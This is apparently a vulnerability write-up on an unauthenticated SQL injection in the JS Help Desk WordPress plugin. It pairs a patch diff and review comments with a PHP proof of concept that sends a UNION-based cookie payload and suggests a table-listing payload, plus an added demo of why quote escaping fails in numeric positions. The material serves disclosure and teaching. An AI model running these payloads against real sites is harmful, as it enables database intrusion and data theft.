+        // $query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".esc_sql($child)."'";
         // $count = jssupportticket::$_db->get_var($query);
         // if ($count > 0) {
         //     JSSTmessage::setMessage(esc_html(__('Field cannot mark as required', 'js-support-ticket')), 'error');
         //     return;
         // }
         if ($status == 'required') {
-            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as required', 'js-support-ticket')),'updated');
         } elseif ($status == 'unrequired') {
-            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
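Review bot: the first two changed lines in this hunk edit commented-out code; adding esc_sql() to a query that never runs is churn that makes the diff harder to review. Either delete the dead block or leave it untouched. The live UPDATE statements below are already behind if (!is_numeric($id)) return false;, so (int) $id would be the clearer form there.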
@@ -120,16 +120,16 @@
         if ($action == 'down') {
             $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2
                         SET f1.ordering = f1.ordering - 1 WHERE f1.ordering = f2.ordering + 1 AND f1.fieldfor = f2.fieldfor
-                        AND f2.id = " . $id;
+                        AND f2.id = " . esc_sql($id);
             jssupportticket::$_db->query($query);
-            $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . $id;
+            $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . esc_sql($id);
             jssupportticket::$_db->query($query);
             JSSTmessage::setMessage(esc_html(__('Field ordering down', 'js-support-ticket')),'updated');
         } elseif ($action == 'up') {
             $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2 SET f1.ordering = f1.ordering + 1
-                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . $id;
+                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . esc_sql($id);
             jssupportticket::$_db->query($query);
-            $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . $id;
+            $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . esc_sql($id);
             jssupportticket::$_db->query($query);
             JSSTmessage::setMessage(esc_html(__('Field ordering up', 'js-support-ticket')),'updated');
         }
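Review bot: each ordering move is two UPDATE statements run back to back with no error check and no transaction, so if the second query() fails after the first succeeds, two fields end up sharing an ordering value. Wrap the pair in START TRANSACTION / COMMIT, or at least check last_error after the first query and bail out, and cast $id to int rather than esc_sql() since every comparison is numeric.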
@@ -147,7 +147,7 @@
 	    if(!isset($formid) || $formid==''){
 		    $formid = JSSTincluder::getJSModel('ticket')->getDefaultMultiFormId();
 	    }
-        $query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$published." AND fieldfor =  " . $fieldfor ." AND multiformid =  " . $formid . " ORDER BY ordering ";
+        $query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$published." AND fieldfor =  " . esc_sql($fieldfor) ." AND multiformid =  " . esc_sql($formid) . " ORDER BY ordering ";
         jssupportticket::$_data['fieldordering'] = jssupportticket::$_db->get_results($query);
         return;
     }
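Review bot: $published is interpolated directly into WHERE ".$published." AND ... and is not touched by this change; only $fieldfor and $formid get esc_sql(), and both sit in numeric positions where quote escaping has no effect. $published must be one of a fixed set of expressions chosen in PHP, never a string from outside, and the two ids should be cast with (int).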
@@ -160,7 +160,7 @@
         if ($data['isuserfield'] == 1) {
             // value to add as field ordering
             if ($data['id'] == '') { // only for new
-                $query = "SEL

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2023-7337 - JS Help Desk – AI-Powered Support & Ticketing System 2.8.2 - Unauthenticated SQL Injection via 'js-support-ticket-token-tkstatus' Cookie

$target_url = "http://target-wordpress-site.com";

// Craft SQL injection payload to extract database version
// The payload abuses the session ID parameter in the wphdnotification.php query
$malicious_session_id = "' UNION SELECT version()-- ";

// Set up cURL request with malicious cookie
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// The plugin reads the 'js-support-ticket-token-tkstatus' cookie for session handling
$cookie_header = "js-support-ticket-token-tkstatus=" . urlencode($malicious_session_id);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_header);

// Execute request; stop with a transport error rather than reporting HTTP 0
$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, "cURL error: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// The injection occurs when the plugin processes session data
// The vulnerable query in wphdnotification.php line 81 becomes:
// SELECT sessionmsg FROM js_ticket_jshdsessiondata WHERE usersessionid = '' UNION SELECT version()-- ' AND sessionfor = '...'
// This returns the database version instead of session messages

echo "HTTP Response Code: " . $http_code . "\n";
echo "Response length: " . strlen($response) . " bytes\n";
echo "Check database logs or application responses for SQL injection results\n";

// Alternative payload for data extraction:
// ' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- 
// This would list all tables in the current database

?>
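The PoC above targets a quoted string position, which is the one place the esc_sql() change in the diff genuinely closes. Most of the other hunks apply the same call to bare numeric positions and two LIKE patterns, where it does not. The following is an added example, not code from the JS Help Desk plugin or from the Atomic Edge PoC, that rebuilds those three query shapes in plain PHP and shows which ones a quote-free payload still gets through. jsst_esc_sql() and jsst_esc_like() are local stand-ins for WordPress esc_sql() and $wpdb->esc_like() (assumed to escape exactly the characters noted in the comments), the wp_js_ticket_* table names are illustrative, and numeric_position_is_safe() is a helper written for this example only.

```php
<?php
// Added example: not code from the JS Help Desk plugin or from the Atomic Edge PoC.
// jsst_esc_sql() stands in for WordPress esc_sql(), which escapes the characters
// that could terminate a quoted string literal and nothing else.
function jsst_esc_sql(string $value): string
{
    return strtr($value, [
        "\\" => "\\\\",
        "'"  => "\\'",
        '"'  => '\\"',
        "\0" => "\\0",
        "\n" => "\\n",
        "\r" => "\\r",
    ]);
}

// Stand-in for $wpdb->esc_like(): backslash-escape the LIKE metacharacters.
function jsst_esc_like(string $value): string
{
    return addcslashes($value, '_%\\');
}

// Case 1: quoted string position, the shape of the usersessionid lookup the
// advisory describes. Escaping closes the hole: the payload cannot end the literal.
function query_session_msg(string $sessionid): string
{
    return "SELECT sessionmsg FROM wp_js_ticket_jshdsessiondata"
        . " WHERE usersessionid = '" . jsst_esc_sql($sessionid) . "'";
}

// Case 2: unquoted numeric position with escaping only (department.id, ticket.id,
// multiformid in the diff). There is no quote to escape, so a quote-free payload
// is concatenated unchanged.
function query_department_escaped(string $id): string
{
    return "SELECT * FROM wp_js_ticket_departments WHERE id = " . jsst_esc_sql($id);
}

// Case 3: the same position hardened with an integer cast, which is what
// $wpdb->prepare() does for a %d placeholder.
function query_department_cast(string $id): string
{
    return "SELECT * FROM wp_js_ticket_departments WHERE id = " . (int) $id;
}

// Case 4: LIKE filter. Quote escaping leaves % and _ alone, so the wildcards
// are escaped first and the quote escaping is applied on the outside.
function query_department_like(string $name): string
{
    return "SELECT * FROM wp_js_ticket_departments WHERE departmentname LIKE '%"
        . jsst_esc_sql(jsst_esc_like($name)) . "%'";
}

// Example-only check: a numeric position is intact when the value contributed
// exactly one integer token and nothing after it.
function numeric_position_is_safe(string $sql): bool
{
    return (bool) preg_match('/WHERE id = \d+$/', $sql);
}

$payload_quoted  = "' UNION SELECT version()-- ";   // constructed, same as the PoC
$payload_numeric = "1 OR 1=1";                       // constructed, contains no quote

echo query_session_msg($payload_quoted), PHP_EOL;
echo query_department_escaped($payload_numeric), PHP_EOL;
echo query_department_cast($payload_numeric), PHP_EOL;
echo query_department_like("%"), PHP_EOL;

foreach (['escaped' => query_department_escaped($payload_numeric),
          'cast'    => query_department_cast($payload_numeric)] as $label => $sql) {
    echo $label, ': ', numeric_position_is_safe($sql) ? 'safe' : 'INJECTABLE', PHP_EOL;
}
```

Run it with php on the command line. The quoted payload stays inside the string literal in case 1, the escaped numeric query in case 2 still carries the OR 1=1 tail and is reported INJECTABLE, the cast in case 3 reduces the same payload to a single integer, and the LIKE query in case 4 ends up with a literal percent sign instead of a match-everything wildcard. In a real plugin the cast and the esc_like() step are best expressed through $wpdb->prepare() with %d and %s placeholders, which applies both uniformly.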
